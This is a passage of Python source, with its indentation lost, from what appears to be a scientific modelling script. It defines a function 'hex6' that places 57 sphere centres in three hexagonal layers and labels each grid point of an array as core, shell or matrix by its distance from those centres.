cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
#       print('here')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
###########################################################################################################################
###########################################################################################################################
def hex6 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
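# Largest hard-coded cluster: three layers of 19 sphere centres each (57 in total) on a wider
# hexagonal arrangement; each centre is classified with the same core/shell/matrix test as in hex1.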
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=((6)*radiusc/dl-i+1)
yy1= ((6)*radiusc/dl-j+1)
zz1=(radiusc/dl-k+1)
xx2=((6-1.0)*radiusc/dl-i+1)
yy2= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((6+1.0)*radiusc/dl-i+1)
yy3= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((6-1.0)*radiusc/dl-i+1)
yy4= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((6+1.0)*radiusc/dl-i+1)
yy5= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(4*radiusc/dl-i+1)
yy6= (6*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(8*radiusc/dl-i+1)
yy7= (6*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
xx8=((6)*radiusc/dl-i+1)
yy8= ((8+sqrt(2.0))*radiusc/dl-j+1)
zz8=(1*radiusc/dl-k+1)
xx9=((6)*radiusc/dl-i+1)
yy9= ((4-sqrt(2.0))*radiusc/dl-j+1)
zz9=(1*radiusc/dl-k+1)
xx10=((10.0)*radiusc/dl-i+1)
yy10= ((6.0)*radiusc/dl-j+1)
zz10=(1*radiusc/dl-k+1)
xx11=((3-1.0)*radiusc/dl-i+1)
yy11= ((6.0)*radiusc/dl-j+1)
zz11=(1*radiusc/dl-k+1)
xx12=((3)*radiusc/dl-i+1)
yy12= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz12=(1*radiusc/dl-k+1)
xx13=(9*radiusc/dl-i+1)
yy13= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz13=(1*radiusc/dl-k+1)
xx14=((9+0.05)*radiusc/dl-i+1)
yy14= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz14=(1*radiusc/dl-k+1)
xx15=((3)*radiusc/dl-i+1)
yy15= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz15=((1)*radiusc/dl-k+1)
xx16=((3+1+0.05)*radiusc/dl-i+1)
yy16= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz16=((1)*radiusc/dl-k+1)
xx17=((8)*radiusc/dl-i+1)
yy17= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz17=((1)*radiusc/dl-k+1)
xx18=((8)*radiusc/dl-i+1)
yy18= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz18=((1)*radiusc/dl-k+1)
xx19=((4)*radiusc/dl-i+1)
yy19= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz19=((1)*radiusc/dl-k+1)
    # second layer of sphere centres (19 centres at z = 3*radiusc/dl)
xx20=((6)*radiusc/dl-i+1)
yy20= ((6)*radiusc/dl-j+1)
zz20=(3*radiusc/dl-k+1)
xx21=((6-1.0)*radiusc/dl-i+1)
yy21= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz21=(3*radiusc/dl-k+1)
xx22=((6+1.0)*radiusc/dl-i+1)
yy22= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz22=(3*radiusc/dl-k+1)
xx23=((6-1.0)*radiusc/dl-i+1)
yy23= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz23=(3*radiusc/dl-k+1)
xx24=((6+1.0)*radiusc/dl-i+1)
yy24= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz24=(3*radiusc/dl-k+1)
xx25=(4*radiusc/dl-i+1)
yy25= (6*radiusc/dl-j+1)
zz25=(3*radiusc/dl-k+1)
xx26=(8*radiusc/dl-i+1)
yy26= (6*radiusc/dl-j+1)
zz26=(3*radiusc/dl-k+1)
xx27=((6)*radiusc/dl-i+1)
yy27= ((8+sqrt(2.0))*radiusc/dl-j+1)
zz27=(3*radiusc/dl-k+1)
xx28=((6)*radiusc/dl-i+1)
yy28= ((4-sqrt(2.0))*radiusc/dl-j+1)
zz28=(3*radiusc/dl-k+1)
xx29=((10.0)*radiusc/dl-i+1)
yy29= ((6.0)*radiusc/dl-j+1)
zz29=(3*radiusc/dl-k+1)
xx30=((3-1.0)*radiusc/dl-i+1)
yy30= ((6.0)*radiusc/dl-j+1)
zz30=(3*radiusc/dl-k+1)
xx31=((3)*radiusc/dl-i+1)
yy31= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz31=(3*radiusc/dl-k+1)
xx32=(9*radiusc/dl-i+1)
yy32= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz32=(3*radiusc/dl-k+1)
xx33=((9+0.05)*radiusc/dl-i+1)
yy33= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz33=(3*radiusc/dl-k+1)
xx34=((3)*radiusc/dl-i+1)
yy34= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz34=((3)*radiusc/dl-k+1)
xx35=((3+1+0.05)*radiusc/dl-i+1)
yy35= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz35=((3)*radiusc/dl-k+1)
xx36=((8)*radiusc/dl-i+1)
yy36= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz36=((3)*radiusc/dl-k+1)
xx37=((8)*radiusc/dl-i+1)
yy37= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz37=((3)*radiusc/dl-k+1)
xx38=((4)*radiusc/dl-i+1)
yy38= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz38=((3)*radiusc/dl-k+1)
    # third layer of sphere centres (19 centres at z = 5*radiusc/dl)
xx39=((6)*radiusc/dl-i+1)
yy39= ((6)*radiusc/dl-j+1)
zz39=(5*radiusc/dl-k+1)
xx40=((6-1.0)*radiusc/dl-i+1)
yy40= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz40=(5*radiusc/dl-k+1)
xx41=((6+1.0)*radiusc/dl-i+1)
yy41= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz41=(5*radiusc/dl-k+1)
xx42=((6-1.0)*radiusc/dl-i+1)
yy42= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz42=(5*radiusc/dl-k+1)
xx43=((6+1.0)*radiusc/dl-i+1)
yy43= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz43=(5*radiusc/dl-k+1)
xx44=(4*radiusc/dl-i+1)
yy44= (6*radiusc/dl-j+1)
zz44=(5*radiusc/dl-k+1)
xx45=(8*radiusc/dl-i+1)
yy45= (6*radiusc/dl-j+1)
zz45=(5*radiusc/dl-k+1)
xx46=((6)*radiusc/dl-i+1)
yy46= ((8+sqrt(2.0))*radiusc/dl-j+1)
zz46=(5*radiusc/dl-k+1)
xx47=((6)*radiusc/dl-i+1)
yy47= ((4-sqrt(2.0))*radiusc/dl-j+1)
zz47=(5*radiusc/dl-k+1)
xx48=((10.0)*radiusc/dl-i+1)
yy48= ((6.0)*radiusc/dl-j+1)
zz48=(5*radiusc/dl-k+1)
xx49=((3-1.0)*radiusc/dl-i+1)
yy49= ((6.0)*radiusc/dl-j+1)
zz49=(5*radiusc/dl-k+1)
xx50=((3)*radiusc/dl-i+1)
yy50= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz50=(5*radiusc/dl-k+1)
xx51=(9*radiusc/dl-i+1)
yy51= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz51=(5*radiusc/dl-k+1)
xx52=((9+0.05)*radiusc/dl-i+1)
yy52= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz52=(5*radiusc/dl-k+1)
xx53=((3)*radiusc/dl-i+1)
yy53= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz53=((5)*radiusc/dl-k+1)
xx54=((3+1+0.05)*radiusc/dl-i+1)
yy54= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz54=((5)*radiusc/dl-k+1)
xx55=((8)*radiusc/dl-i+1)
yy55= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz55=((5)*radiusc/dl-k+1)
xx56=((8)*radiusc/dl-i+1)
yy56= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz56=((5)*radiusc/dl-k+1)
xx57=((4)*radiusc/dl-i+1)
yy57= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz57=((5)*radiusc/dl-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
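    # cc = squared distance from this grid point to sphere centre 1, in units of the
    # full sphere radius (div = radiusc/dl); note that radiuscore+(radiusc-radiuscore)
    # is simply radiusc, so the thresholds below are (radiuscore/radiusc)**2 and
    # (radiusshell/radiusc)**2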
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
    # print('here')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx22/(div))**2+(yy22/(div))**2+(zz22/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx23/(div))**2+(yy23/(div))**2+(zz23/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx24/(div))**2+(yy24/(div))**2+(zz24/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx25/(div))**2+(yy25/(div))**2+(zz25/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
